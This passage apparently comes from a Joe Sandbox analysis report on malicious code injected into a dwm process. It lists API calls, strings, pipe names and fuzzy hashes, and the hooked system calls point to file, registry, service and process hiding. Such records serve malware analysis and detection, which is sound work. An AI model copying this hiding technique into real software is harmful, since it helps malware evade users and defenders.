                                                              • Instruction Fuzzy Hash: B6316036214F8086EB60CF25E8443AE73B4F789B98F640126EADD57B99EF38C545CB11

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 021fd72a2c85c48f49af8c87edb02117a9eaee4286e2f1a353b9e8475e37f6ea
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 3E514A76200B848AEB55CF62E54839AB7B1F789FD9F244124DA9E07758EF3CC049CB11

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: 5209b30d384ed27263cef4efd0be4bd3ee72a5dd7a678bd2366918c1dfa3fcbd
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: 8A31D265601A4AA0FA02EFAEEC997E47331B788388FB00413E4DD12575AF38865DC372


                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 3a3445b5c5b7236f1e9901a80e3d34463ef94fa3386ea108bbdd2f2539c2dc99
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: AE81E1216002C18AFA50AB65984D37933B0FB85BA0F7485259AED877D6EB39C945C733

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 000002BAAEDBCE37
                                                              • FlsGetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCEBC
                                                              • SetLastError.KERNEL32 ref: 000002BAAEDBCED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,000002BAAEDBECCC,?,?,?,?,000002BAAEDBBF9F,?,?,?,?,?,000002BAAEDB7AB0), ref: 000002BAAEDBCF2C
                                                                • Part of subcall function 000002BAAEDBD6CC: HeapAlloc.KERNEL32 ref: 000002BAAEDBD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF54
                                                                • Part of subcall function 000002BAAEDBD744: HeapFree.KERNEL32 ref: 000002BAAEDBD75A
                                                                • Part of subcall function 000002BAAEDBD744: GetLastError.KERNEL32 ref: 000002BAAEDBD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002BAAEDC0A6B,?,?,?,000002BAAEDC045C,?,?,?,000002BAAEDBC84F), ref: 000002BAAEDBCF76
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: d27bcd3e3be06ac23451f81ac6a3d7446f6fead1fd5b5113facc878efb065f1d
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: 8241762030224486FA686775599D37D3371AB457B4F344728E8BE8A6D6FF28C401C633
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: 9fafb785bd32f33501c11e8a0f52c5083696a88c54c8535996ee574ab5fa00e8
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 1B212936614B40C2FB108B25F54836A77B1F789BE5F604215EAAD03BA8DF7CC549CB12
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 7037e6799ea039a80316b5bf6abe8f5fcbb70f7b4837cb3c52c8002aac337661
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: E8E1A072A04B808AFB60DF69D48839D77B4F745B98F600116EECD5BB99EB34C481C722
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: bc0b542717c820ff85c66551c43a1f08ca029532d89f3d82a19b61928358f9aa
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: 08E1AD72604BC08AEB60DF65D4883AD7BB0F785B98F601115EECE57B9ACB34C491C722
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 7aa3b17e0f84c3e0a82991023fe1872ea8ae28538d350a5975d3f8b2dd5b6dae
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 0841B422311A0099FA26DB66AC1875633B5F749BE0F2941299D9EDB785FF38C445C322
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
APIs
• FlsGetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD087
• FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0A6
• FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0CE
• FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0DF
• FlsSetValue.KERNEL32(?,?,?,000002BAAEDBC7DE,?,?,?,?,?,?,?,?,000002BAAEDBCF9D,?,?,00000001), ref: 000002BAAEDBD0F0
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: CurrentThread
• String ID:
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: _set_statfp
• String ID:
APIs
Memory Dump Source
• Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
Similarity
• API ID: _set_statfp
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: Tuesday$Wednesday$or copy constructor iterator'
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
APIs
Strings
Memory Dump Source
• Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: bfe5eb3d9197eb9fe7630dd13c2fdbd57141f2be83de8ef8ce1466eed62048fc
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 4451DE3A7012808AEB14DF15E408B3937B5F350B98FB18566DA8E63B88EB35CC41C726
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 3242871069-629598281
                                                              • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction ID: ce1ec2d10bd408fbb4e1b43acc9849800e3f156cc7cb3c1caa3b35821c2638a4
                                                              • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                              • Instruction Fuzzy Hash: 7431B13A201780DAE714EF15E848B2977B5F740B98FA58424EEDF17B88DB39C941C726
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction ID: 1a20e79f6ef8153befe1d0df1db048902042e9da20d506d9208d6c4e0a4957e5
                                                              • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                              • Instruction Fuzzy Hash: 2DD1BF32B14A80CAE712CFB9D44829C3BB6F394BD8F248216DE9D97B99DB34C506C351
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free
                                                              • String ID:
                                                              • API String ID: 3168794593-0
                                                              • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction ID: 86bf52ea889e7902f67d83ede30c2329e68bb4db53304ce25c0290c24fa7312b
                                                              • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                              • Instruction Fuzzy Hash: C1118B76900A90CAE716DFB2A80814977B0F789FC2F294025EBAD03756DF38C050C751
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction ID: f80f4d2cf748f4e5136c89bb4fe743ee3a095eb48e74bc370453a9d580881d64
                                                              • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                              • Instruction Fuzzy Hash: 0691C132700A5089F762DF7D94883AD3BB5B794BC8F344119DE8E67A98DB35C482C722
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction ID: b31ded150e3051e41e268648a384d06e1058013ecd71d70e61595cb510ffbebd
                                                              • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                              • Instruction Fuzzy Hash: 08113C22711F058AEF00DF70E8583A833B4F759B58F540E25EAAD867A8DF78C198C391
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: d4a1db6d941a9e24dee58ad62761dacc7528e04d884a64fa8a3e9228776e050a
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 6071C03720078186F7659E2E98583AA77B4F389BC4F640026DE8E53B89FF35C645C716
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CallTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 3163161869-2084237596
                                                              • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction ID: 52e7a4fe5a1ad37d55796d6e8307dc892d3c612185be3856783d69c5e1161c58
                                                              • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                              • Instruction Fuzzy Hash: A5617637A01B848AEB21DF65D4843AD7BB0F348B88F248215EF8D17B98DB38D595C711
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction ID: c6f487bb5e8b81d71599e2ee1ff1cd92555f69ade49a330ce0838babf98a862f
                                                              • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                              • Instruction Fuzzy Hash: 2D51DF2320838185F6659A2DA49C3AFB7B1F395B80F640125DEDE03B99FB39C504C762
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction ID: 992df31dfa45ee89665b61984f332203c37cc16d3da8535cb90ddab8a2c78d4c
                                                              • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                              • Instruction Fuzzy Hash: 7841C432315A8086EB21DF79E8483AA77B0F798BD4F604125EE8D87798EB3CC441C751
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction ID: 84b5d480bb409fd40947743b60f86dcaefe1a7f775b724482f36f78cc6f57770
                                                              • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                              • Instruction Fuzzy Hash: 9811FB36214B8082EB618B25E44435AB7E5FB88B94F694225EECD07759EF3CC551CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: ierarchy Descriptor'$riptor at (
                                                              • API String ID: 592178966-758928094
                                                              • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                              • Instruction ID: bcb890a832a902aa060464321f2cefe5ffbff100b0cde4ba18012b4dd5ede165
                                                              • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
